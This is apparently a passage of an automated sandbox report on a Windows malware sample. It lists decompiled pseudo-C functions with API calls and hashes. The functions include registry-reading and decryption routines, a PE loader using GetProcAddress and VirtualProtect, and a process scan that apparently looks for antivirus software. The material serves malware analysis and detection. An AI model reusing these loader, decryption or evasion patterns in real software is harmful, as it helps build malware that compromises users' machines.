                        				void* _t56;
                        				void* _t57;
                        				void* _t58;
                        
                        				_t52 = __edx;
                        				_v16 = _v16 & 0x00000000;
                        				_t46 = _a4;
                        				_t54 = ( *_t46 & 0x000000ff) + 0x110;
                        				_v12 = 0x110;
                        				_t24 = E00505C4E(_t54);
                        				_a4 = _t24;
                        				if(_t24 != 0) {
                        					memcpy(_t24,  *0x50a320, 0x110);
                        					_t27 =  *0x50a324; // 0x0
                        					_t58 = _t57 + 0xc;
                        					if(_t27 != 0) {
                        						E005075D7(_t46, _a4, 0x110, _t27, 0);
                        					}
                        					if(E00504581( &_v36) != 0) {
                        						_t35 = E005035A1(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                        						if(_t35 == 0) {
                        							_t56 = _v20;
                        							_v36 =  *_t46;
                        							_v16 = E0050421A(_t56, _a8, _t52, _t46, _a12);
                        							 *(_t56 + 4) = _v36;
                        							_t20 =  &(_t46[4]); // 0x8b4875fc
                        							memset(_t56, 0, _v12 - ( *_t20 & 0xf));
                        							_t58 = _t58 + 0xc;
                        							E00502A03(_t56);
                        						}
                        					}
                        					memset(_a4, 0, _t54);
                        					E00502A03(_a4);
                        				}
                        				return _v16;
                        			}

                        APIs
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • memcpy.NTDLL(00000000,00000110,00501C1F,00501C1F,?,?,00501C1F,?,?,005024E4,?), ref: 005018CC
                        • memset.NTDLL ref: 00501942
                        • memset.NTDLL ref: 00501956
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memset$AllocateHeapmemcpy
                        • String ID:
                        • API String ID: 1529149438-0
                        • Opcode ID: af4041985f669a93d54903bd6f7d0107528219f9ba042576d87dea969880b8c8
                        • Instruction ID: 2d3242c1e9bd7a1638c32f0d3a968615e8c167fb55dbeef207523f0f40a42297
                        • Opcode Fuzzy Hash: af4041985f669a93d54903bd6f7d0107528219f9ba042576d87dea969880b8c8
                        • Instruction Fuzzy Hash: 4C214A75A00619ABDF11AFA5CC96FEEBFB8BF48340F044425F904E6291E734DA008BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                        				intOrPtr _t4;
                        				void* _t10;
                        				signed int _t11;
                        				void* _t13;
                        
                        				_t13 = 1;
                        				_t4 = _a8;
                        				if(_t4 == 0) {
                        					if(InterlockedDecrement(0x50a294) == 0) {
                        						E00501547();
                        					}
                        				} else {
                        					if(_t4 == 1 && InterlockedIncrement(0x50a294) == 1) {
                        						_t10 = E00504430(_t11, _a4); // executed
                        						if(_t10 != 0) {
                        							_t13 = 0;
                        						}
                        					}
                        				}
                        				return _t13;
                        			}

                        APIs
                        • InterlockedIncrement.KERNEL32(0050A294), ref: 005041E5
                          • Part of subcall function 00504430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00504445
                        • InterlockedDecrement.KERNEL32(0050A294), ref: 00504205
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Interlocked$CreateDecrementHeapIncrement
                        • String ID:
                        • API String ID: 3834848776-0
                        • Opcode ID: 86f3771522d7631488a6b887b6f8059e5b81a982c49f190279ca4b5c824226fd
                        • Instruction ID: 4068d6eefef94eeed4cc13863ea151b6c3e8bcd9e7c6d3c36ed21ec9ab559536
                        • Opcode Fuzzy Hash: 86f3771522d7631488a6b887b6f8059e5b81a982c49f190279ca4b5c824226fd
                        • Instruction Fuzzy Hash: A6E04F7D38422357C63137649C08BAEAE50BF71B88F484424BA49D50F6D720CC41DEE2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E6C501C12(void* __ecx) {
                        				void* _v8;
                        				char _v12;
                        				signed short _t15;
                        				char* _t18;
                        				char* _t25;
                        				char* _t29;
                        
                        				_t22 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t25 = 0;
                        				if(E6C501112( &_v8,  &_v12,  *0x6c5041cc ^ 0x196db149) != 0) {
                        					if(_v8 == 0) {
                        						_t29 = 0;
                        					} else {
                        						_t29 = E6C501BCB(_t22, _v8,  *0x6c5041cc ^ 0x6e49bbff);
                        					}
                        					if(_t29 != 0) {
                        						_t15 = E6C501566(_t22); // executed
                        						_v12 = _t15 & 0x0000ffff;
                        						_t18 = StrStrIA(_t29,  &_v12); // executed
                        						if(_t18 != 0) {
                        							_t25 = 0x657;
                        						}
                        					}
                        					HeapFree( *0x6c504190, 0, _v8);
                        				}
                        				return _t25;
                        			}

                        APIs
                        • StrStrIA.KERNELBASE(00000000,6C501810,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501C69
                        • HeapFree.KERNEL32(00000000,?,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501C83
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 2708b5634ef4928896a2649fc71cd85c5339eb46499b8940106e92b6cd42b76d
                        • Instruction ID: 5512cd01bb9294e13f213021b15dee0a2c57b59770acee38881905455e5f651b
                        • Opcode Fuzzy Hash: 2708b5634ef4928896a2649fc71cd85c5339eb46499b8940106e92b6cd42b76d
                        • Instruction Fuzzy Hash: 71018F76B01514EBCB008BA5CD44E9F77BDAB99648F110166EA05E3500EB30DE0097A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualProtectEx.KERNELBASE(000000FF,?,000030FF,00000040,6D568EE0), ref: 6C53BC44
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
                        • Instruction ID: c99ef4ebb9da80943dbb46524bd1d57d40bcbcf57b470a9b152e74a9ebbec468
                        • Opcode Fuzzy Hash: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
                        • Instruction Fuzzy Hash: DA514976B012108FDF04EE69CC917AA3BB5E74E324BDB422AE509D7761E734B448CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E00504BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                        				intOrPtr _v12;
                        				void* _v18;
                        				short _v20;
                        				intOrPtr _t15;
                        				short _t17;
                        				intOrPtr _t19;
                        				short _t23;
                        
                        				_t23 = 0;
                        				_v20 = 0;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosw");
                        				_t15 =  *0x50a2d0; // 0x2add5a8
                        				_t4 = _t15 + 0x50b394; // 0x2fe893c
                        				_t20 = _t4;
                        				_t6 = _t15 + 0x50b124; // 0x650047
                        				_t17 = E00507471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                        				if(_t17 < 0) {
                        					_t23 = _t17;
                        				} else {
                        					if(_v20 != 8) {
                        						_t23 = 1;
                        					} else {
                        						_t19 = E00504C7C(_t20, _v12);
                        						if(_t19 == 0) {
                        							_t23 = 8;
                        						} else {
                        							 *_a16 = _t19;
                        						}
                        						__imp__#6(_v12);
                        					}
                        				}
                        				return _t23;
                        			}











                        APIs
                          • Part of subcall function 00507471: SysFreeString.OLEAUT32(?), ref: 00507550
                          • Part of subcall function 00504C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,005077C1,004F0053,00000000,?), ref: 00504C85
                          • Part of subcall function 00504C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,005077C1,004F0053,00000000,?), ref: 00504CAF
                          • Part of subcall function 00504C7C: memset.NTDLL ref: 00504CC3
                        • SysFreeString.OLEAUT32(00000000), ref: 00504C65
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeString$lstrlenmemcpymemset
                        • String ID:
                        • API String ID: 397948122-0
                        • Opcode ID: 599b432460b9b4197f2e944c3dff426352fc558065b06959feb3052f2ee1f538
                        • Instruction ID: 94d11ecfb6e9849c42ff7c2f26d4356b1464bc011f0fdae5c9f960a88ceb0ca7
                        • Opcode Fuzzy Hash: 599b432460b9b4197f2e944c3dff426352fc558065b06959feb3052f2ee1f538
                        • Instruction Fuzzy Hash: 10019A7250102ABBEF10ABA8CD488AEBFB8FB48700F004965EA01E20A1D3709E15DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00505C4E(long _a4) {
                        				void* _t2;
                        
                        				_t2 = RtlAllocateHeap( *0x50a290, 0, _a4); // executed
                        				return _t2;
                        			}




                        0x00505c5a
                        0x00505c60

                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: a9b0f1f82e43a921271ff7ff0f6b626961ca98314b1ca9a7427387c8053e839e
                        • Instruction ID: 12642524334f57376bb96d991bb924424dc34353cb2bdf95fd0db1c45962f89d
                        • Opcode Fuzzy Hash: a9b0f1f82e43a921271ff7ff0f6b626961ca98314b1ca9a7427387c8053e839e
                        • Instruction Fuzzy Hash: 53B01239404200ABCA024B00DD08F0DBB22B774B00F008020B20840074C2321428FB06
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00502A03(void* _a4) {
                        				char _t2;
                        
                        				_t2 = RtlFreeHeap( *0x50a290, 0, _a4); // executed
                        				return _t2;
                        			}




                        0x00502a0f
                        0x00502a15

                        APIs
                        • RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: FreeHeap
                        • String ID:
                        • API String ID: 3298025750-0
                        • Opcode ID: 87143c1af6866df74f5253b3d7e8f94847620273374c2aa28f2accafa574f470
                        • Instruction ID: 3267051b7024548dd32656e3d3e7f673ca995aa8d0c1c00aa54f3933d90dfc83
                        • Opcode Fuzzy Hash: 87143c1af6866df74f5253b3d7e8f94847620273374c2aa28f2accafa574f470
                        • Instruction Fuzzy Hash: 0DB01235004200EBDE024B00DD0CF0D7B22B7B0B00F008020B2440007482320424FB15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E6C501236(void* __eax) {
                        				char _v8;
                        				void* _v12;
                        				void* __edi;
                        				void* _t18;
                        				long _t24;
                        				long _t26;
                        				long _t29;
                        				intOrPtr _t40;
                        				void* _t41;
                        				intOrPtr* _t42;
                        				void* _t44;
                        
                        				_t41 = __eax;
                        				_t16 =  *0x6c5041cc;
                        				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6c5041cc - 0x63698bc4 &  !( *0x6c5041cc - 0x63698bc4);
                        				_t18 = E6C501AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6c5041cc - 0x63698bc4 &  !( *0x6c5041cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6c5041cc - 0x63698bc4 &  !( *0x6c5041cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                        				if(_t18 != 0) {
                        					_t29 = 8;
                        					goto L8;
                        				} else {
                        					_t40 = _v8;
                        					_t29 = E6C5014DE(_t33, _t40, _t41);
                        					if(_t29 == 0) {
                        						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                        						_t24 = E6C501F31(_t40, _t44); // executed
                        						_t29 = _t24;
                        						if(_t29 == 0) {
                        							_t26 = E6C501030(_t44, _t40); // executed
                        							_t29 = _t26;
                        							if(_t29 == 0) {
                        								_push(_t26);
                        								_push(1);
                        								_push(_t40);
                        								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                        									_t29 = GetLastError();
                        								}
                        							}
                        						}
                        					}
                        					_t42 = _v12;
                        					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                        					E6C50136A(_t42);
                        					L8:
                        					return _t29;
                        				}
                        			}















                        APIs
                          • Part of subcall function 6C501AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6C501272,?,?,?,?,00000002,00000000,?,?), ref: 6C501AC9
                          • Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501AEB
                          • Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B01
                          • Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B17
                          • Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B2D
                          • Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B43
                          • Part of subcall function 6C5014DE: memcpy.NTDLL(00000000,00000002,6C501280,?,?,?,?,?,6C501280,?,?,?,?,?,?,00000002), ref: 6C50150B
                          • Part of subcall function 6C5014DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6C50153E
                          • Part of subcall function 6C501F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6C501F69
                          • Part of subcall function 6C501030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6C501069
                          • Part of subcall function 6C501030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6C5010DE
                          • Part of subcall function 6C501030: GetLastError.KERNEL32 ref: 6C5010E4
                        • GetLastError.KERNEL32(?,?), ref: 6C5012B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                        • String ID:
                        • API String ID: 2673762927-0
                        • Opcode ID: 2062bb0565fd470f1f433a6cd90dde6696bf7f975ebd79a03d69eb7a959d2d0b
                        • Instruction ID: f8f1ae78c12fedaae2d600ae9a52c8c623b0a4b6043b3921966c895f01f30279
                        • Opcode Fuzzy Hash: 2062bb0565fd470f1f433a6cd90dde6696bf7f975ebd79a03d69eb7a959d2d0b
                        • Instruction Fuzzy Hash: 35112B76700706ABD7209AAACC80DDB77BCBF8830C704025DE901D7A41E7A0ED0687E2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E005030AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				signed short _t18;
                        				void* _t24;
                        				signed int _t26;
                        				signed short _t27;
                        
                        				if(_a4 != 0) {
                        					_t18 = E00504BFF(_a4, _a8, _a12, __esi); // executed
                        					_t27 = _t18;
                        				} else {
                        					_t27 = E00505419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                        					if(_t27 == 0) {
                        						_t26 = _a8 >> 1;
                        						if(_t26 == 0) {
                        							_t27 = 2;
                        							HeapFree( *0x50a290, 0, _a12);
                        						} else {
                        							_t24 = _a12;
                        							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
                        							 *__esi = _t24;
                        						}
                        					}
                        				}
                        				return _t27;
                        			}








                        APIs
                          • Part of subcall function 00505419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002), ref: 0050545B
                          • Part of subcall function 00505419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43), ref: 00505480
                          • Part of subcall function 00505419: RegCloseKey.ADVAPI32(80000002,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002,00000000,?), ref: 005054B0
                        • HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00504A79,?,004F0053,02FE9338,00000000,?), ref: 005030F8
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: QueryValue$CloseFreeHeap
                        • String ID:
                        • API String ID: 2109406458-0
                        • Opcode ID: 25e20547f4d4875c58021e8ece70dea6601a1babef77f732c09921fe95521a00
                        • Instruction ID: 9c72cfdf10805b00dd55b8f798e1e285bc80b1ac4844d06ed5b550a5bfa0a120
                        • Opcode Fuzzy Hash: 25e20547f4d4875c58021e8ece70dea6601a1babef77f732c09921fe95521a00
                        • Instruction Fuzzy Hash: 5D013C32200249FBCF129F44CC56FAE3F7AFB98350F188429FA198A1A1D771DA24DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E00505872(intOrPtr* __edi) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr _v16;
                        				intOrPtr _t15;
                        				intOrPtr* _t21;
                        
                        				_t21 = __edi;
                        				_push( &_v12);
                        				_push(__edi);
                        				_v8 = 0x1d4c0;
                        				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                        				while(1) {
                        					_v16 = _t15;
                        					Sleep(0x1f4); // executed
                        					if(_v12 == 4) {
                        						break;
                        					}
                        					if(_v8 == 0) {
                        						L4:
                        						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                        						continue;
                        					} else {
                        						if(_v8 <= 0x1f4) {
                        							_v16 = 0x80004004;
                        						} else {
                        							_v8 = _v8 - 0x1f4;
                        							goto L4;
                        						}
                        					}
                        					L8:
                        					return _v16;
                        				}
                        				goto L8;
                        			}









                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 005058BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 32599fa7bd355a2840c4a318bbd1c82e8dde29eb4c19159bf3662a73ef640c12
                        • Instruction ID: 3ade4431e1ab0bf9fa77ba0083c096625f615b8f326b9ff8df3d269bc5758959
                        • Opcode Fuzzy Hash: 32599fa7bd355a2840c4a318bbd1c82e8dde29eb4c19159bf3662a73ef640c12
                        • Instruction Fuzzy Hash: CBF0FF75D01618EFDB00DB94D488AEEBBB8FF04305F2484AAE902A7181E7B46B84DF55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E00501AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
                        				void* _t13;
                        				void* _t21;
                        
                        				_t11 =  &_a4;
                        				_t21 = 0;
                        				__imp__( &_a8);
                        				_t13 = E005035A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                        				if(_t13 == 0) {
                        					_t21 = E00505C4E(_a8 + _a8);
                        					if(_t21 != 0) {
                        						E00504502(_a4, _t21, _t23);
                        					}
                        					E00502A03(_a4);
                        				}
                        				return _t21;
                        			}






                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,00506301,00000000,?,00505B47,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00501B02
                          • Part of subcall function 005035A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00501B16,00000001,00506301,00000000), ref: 005035D9
                          • Part of subcall function 005035A1: memcpy.NTDLL(00501B16,00506301,00000010,?,?,?,00501B16,00000001,00506301,00000000,?,00505B47,00000000,00506301,?,00000000), ref: 005035F2
                          • Part of subcall function 005035A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0050361B
                          • Part of subcall function 005035A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00503633
                          • Part of subcall function 005035A1: memcpy.NTDLL(00000000,00000000,02FE9630,00000010), ref: 00503685
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                        • String ID:
                        • API String ID: 894908221-0
                        • Opcode ID: 64b49c3c6880a5bb4edba145c84ae38a1a205594f2c6ce8f6b26d975988e7925
                        • Instruction ID: 6be5a9a0ff918e5d60afd0e7a1164ad1b5913f80febddad9dbe3dc16be0e1ec9
                        • Opcode Fuzzy Hash: 64b49c3c6880a5bb4edba145c84ae38a1a205594f2c6ce8f6b26d975988e7925
                        • Instruction Fuzzy Hash: 04F03A76100509BBCF126E55DC09CEF3FADFF853A0F008022FE198A151EA31DA559BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E005045E6(void* __edx, void* __edi, void* _a4) {
                        				int _t7;
                        				int _t13;
                        
                        				_t7 = E00501896(__edx, __edi, _a4,  &_a4); // executed
                        				_t13 = _t7;
                        				if(_t13 != 0) {
                        					memcpy(__edi, _a4, _t13);
                        					 *((char*)(__edi + _t13)) = 0;
                        					E00502A03(_a4);
                        				}
                        				return _t13;
                        			}






                        APIs
                          • Part of subcall function 00501896: memcpy.NTDLL(00000000,00000110,00501C1F,00501C1F,?,?,00501C1F,?,?,005024E4,?), ref: 005018CC
                          • Part of subcall function 00501896: memset.NTDLL ref: 00501942
                          • Part of subcall function 00501896: memset.NTDLL ref: 00501956
                        • memcpy.NTDLL(00501C1F,00501C1F,00000000,00501C1F,00501C1F,00501C1F,?,?,005024E4,?,?,00501C1F,?), ref: 00504602
                          • Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memcpymemset$FreeHeap
                        • String ID:
                        • API String ID: 3053036209-0
                        • Opcode ID: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
                        • Instruction ID: 985b0c31904606da139c03143abc3dc54c3220f73aafe6cf1bae9705d2661042
                        • Opcode Fuzzy Hash: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
                        • Instruction Fuzzy Hash: 55E0867690011A77CB126A94DC05DEF7F5CAF857D0F044011FE0849141F731C61097E2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        APIs
                        • _wcscmp.LIBCMT ref: 6C556F2D
                        • _wcscmp.LIBCMT ref: 6C556F3E
                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F5A
                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F84
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: InfoLocale_wcscmp
                        • String ID: ACP$OCP
                        • API String ID: 1351282208-711371036
                        • Opcode ID: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
                        • Instruction ID: 814d534386a319738601c17fc51356a5642658c7b1dacc2b3072a1e2ccd1af0b
                        • Opcode Fuzzy Hash: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
                        • Instruction Fuzzy Hash: C7019632619285BBEB008E59DC44FE637B89F05758F508017F504DAA54EF31DA91C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E005019E7() {
                        				char _v264;
                        				void* _v300;
                        				int _t8;
                        				intOrPtr _t9;
                        				int _t15;
                        				void* _t17;
                        
                        				_t15 = 0;
                        				_t17 = CreateToolhelp32Snapshot(2, 0);
                        				if(_t17 != 0) {
                        					_t8 = Process32First(_t17,  &_v300);
                        					while(_t8 != 0) {
                        						_t9 =  *0x50a2d0; // 0x2add5a8
                        						_t2 = _t9 + 0x50be04; // 0x73617661
                        						_push( &_v264);
                        						if( *0x50a11c() != 0) {
                        							_t15 = 1;
                        						} else {
                        							_t8 = Process32Next(_t17,  &_v300);
                        							continue;
                        						}
                        						L7:
                        						CloseHandle(_t17);
                        						goto L8;
                        					}
                        					goto L7;
                        				}
                        				L8:
                        				return _t15;
                        			}










                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005019F7
                        • Process32First.KERNEL32(00000000,?), ref: 00501A0A
                        • Process32Next.KERNEL32(00000000,?), ref: 00501A36
                        • CloseHandle.KERNEL32(00000000), ref: 00501A45
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
